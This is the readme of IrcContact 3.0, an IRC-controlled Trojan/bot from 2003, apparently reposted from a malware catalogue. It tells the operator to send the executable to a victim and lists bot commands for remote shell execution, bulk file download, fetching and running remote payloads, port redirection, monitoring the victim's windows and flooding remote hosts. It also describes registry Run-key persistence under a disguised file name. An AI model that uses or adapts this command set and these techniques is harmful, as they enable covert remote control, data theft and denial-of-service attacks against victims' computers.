by Impactus
Written in Visual C++
Released in October 2003
IrcContact 3.0 by Impactus IrcContact is an IRC client (Trojan/BOT) that hiddenly connects to a specified IRC server when executed, a simple IRC client like mIRC or pIRCH is enought to have full access to the bot. Just send the user password or the master password to log on to the bot and it will answer you with many commands that can be executed in the remote computer. There are two levels of access: The user level and the Master level. - The User Level can execute all commands except "Set", "User", "Bot", which consists in changing bot settings, modifying the access list and uninstalling, restart or shutting down the bot - The Master Level can execute all commands This zip file comes with 3 files: 1 - IrcContact.exe - The Trojan/BOT to be sent to the victim. 2 - IrcCFG.exe ----- The Configurator Tool, you can configure the trojan (IrcContact.exe) as you want. 3 - ReadMe.txt ----- The file you are reading! Duh! IrcContact Changelog: Version (2.0 to 3.0) - fixed a bug which reseted the bot configuration - Parsing function rewritten - a bunch of new commands added, see above the commands with an asterisk - added the possibility to use the '"' characters to easily move or copy files _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ The command's with asterisk symbol before are the new command's added from IrcContact 2.0 to 3.0 Bot Commands: <User password> - log on with user access, the "Set", "User" and "Bot" commands will be denied <Master password> - log on with master access, All following commands will be activated cmdlist - Enumerate commands list, NOTE: all the following commands can be executed in DCC chat cmdlist more - Enumerate more commands list, these commands were not included in "cmdlist" because the bot could be disconnected for flooding \<command> - This will execute an Irc Command on the bot. Ex: \join #IrcContact (will make the bot to join #IrcContact) GetInfo - Get Information about the remote computer (Windows version, Computer Name, UserName, CPU speed, etc..) ExitWin <1 to 5> - Exit Windows: 1=Shutdown; 2=Reboot; 3=Logoff; 4=PowerOff; 5=Force ShutDown; *6=Crash Shell <Command> - Execute a remote shell command (DOS command) Notify Pvts - Notifies you whenever the bot receives a private message Wins - Notifies you whenever the remote user changes the active window * Chans - Notifies you whenever anyone send a message, join's ,part's or quit's a channel (where the bot is) Win list - List visible windows list all - List all windows (visible and invisible) Activ <HWND> - Activate window Kill <HWND> - Kill window User -> "User" command requires master level access! list - list currently logged users and retrieves the access level add <Nick> <Level> - logs a user with a certain access level rem <ID> - remove user (log out) Set -> "Set" command requires master level access! nick <new nick> - Change nickname name <new name> - Change name ident <new ident> - Change ident userpass <new userpass> - Change user level password masterpass <new masterpass> - Change master level password channel1 <new channel1> - Change auto join channel1 channel2 <new channel2> - Change auto join channel2 channel3 <new channel3> - Change auto join channel3 server <new server> - Change server to connect serverport <new serverport> - Change server port NickIdent <0 or 1> - Enable or disable nick auto-identify NickPass <new NickPass> - Change nickserv password (auto-identify sould be enabled) RejoinOnKick <0 or 1> - Enable or disable bot Re-Join-on-Kick if kicked from a channel Bot -> "Bot" command requires master level access! Restart <Quit msg> - Restart bot Sleep <Quit msg> - Shutdown bot.. but doesn't uninstall it! Kill <Quit msg> - Completly removes the bot from the infected computer Dir <directory> - List directory, this command is recomended to be done in DCC Chat mode or the bot may be disconnected for flooding! Get <file> - Download a file through DCC, * this command now support's mask download files, Ex: 'get C:\images\*.jpg' -> will download all jpeg images in 'C:\images' mv <Source file> <Dest file> - Move file, *work's using '""' Ex: mv "C:\original file.txt" C":\destination file.txt" cp <Source file> <Dest file> - Copy file, *work's using '""' del <file> - Delete file Flood <IP> <Time in seconds> - Flood a remote host during a specified time, tometimes the bot may get a timeout quit because it may not respond to server pings while flooding! end - stop flood *randnick - Change to a random nick *lanlist - List shares on lan *DNS <IP or Hostname> - Resolve IP or Hostname *Find <rootpath> <filespec> - search for files, Ex: 'find C:\program files *.ini' -> will find all ini files in 'C:\program files' *Viewfile <pathname> - retrieve content of a file (this command work's only in dcc chat to prevent the bot from being disconnected for flood) *mkdir <directory> - Create directory *rmdir <directory> - Remove directory *setattr <pathname> <RASHT> - Set attributes of a file, Ex: setattr C:\ircc.txt ASH -> changes the file attributes to: 'hidden', 'archive' and 'system' *msg <destination> <text> - send a message to <destination> with the text <text>, destination can be a nick or a channel *proc *list - list the processes running on the machine *kill <Process ID> - kill a proccess *spawn <visibility> <pathname> - spawn a process visibility can be 0 for hidden and 1 for visible, Ex: proc spawn 1 notepad.exe -> will spawn the notepad.exe process visible *genclone <number_of_clones> - generate clones *killclones <quit-message> - Kill the clones generated by 'genclone' command *port redir <localport> <remhost:remport> - redirect a port to a remote host in a determined remote port appredir <srcport> <pathname> - redirect a port an application *wget <url> <save-filename> - download a file from an url and save it to <save-filename> *wgetrun <url> <save-filename> - same as before but run's the file after downloading it *msgbox <icon> <buttons> <title> <text> - send a message box: the <icon> can be: 0 = NOICON; 1 = Exclamation; 2 = Question; 3 = STOP; 4 = INFORMATION; - the <buttons> can be: 0 = OK; 1 = OkCancel; 2 = AbortRetryIgnore; 3 = YesNoCancel; 4 = YesNo; 5 = RetryCancel; 6 = CancelTryContinue; - the title and the text must be between "", Ex: msgbox 4 3 "Welcome to ircc3" "Do you want to continue?" -> displays a messagebox with an Information icon, buttons Yes, No and Cancel, The title is "Welcome to ircc3" and the text is "Do you want to continue?". The choosen option will be returned to you cancel <ID> - Cancel's any Get or Find command that should be in progress. Ping - Ping remote machine IP - Retrieve remote machine's IP Address IPset <IP> - Sometimes, IP is not detected correctly, if you want to download files and you know the IP use this command to set it! Log Off - Log Off Note: - All of these commands can be executed through a channel - If you are logged on, the bot will auto accept any DCC Send or DCC chat _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ Uninstalling IrcContact 3.0: 1 - Go to the registry key named HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and delete de value that you specified in the Runtime Pathname from the configuration tool. 2 - Reboot your computer 3 - Delete de file in <System dir>/<RuntimePathname>.exe (Ex: C:\Windows\System\winlogin.exe) After this, no one will access your computer using IrcContact. If you have any suggestions for the next versions or any bug to report just drop me a line at [email protected] I'm not responsible for what you do with this program and what the program causes. So whatever you do, do it at you own risk! Take a look at http://underfloat.ma.cx for other interesting stuff.. Greetings (in no particular order): Liquidk, revoluti0n , Ska-P, Mano, _TaRaNtUla_, SimBios Cheers, Impactus Server: c:\WINDOWS\SYSTEM\pathname.exe size: 106.381 bytes startup: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "pathname" added: c:\WINDOWS\SYSTEM\pathname.dllMegaSecurity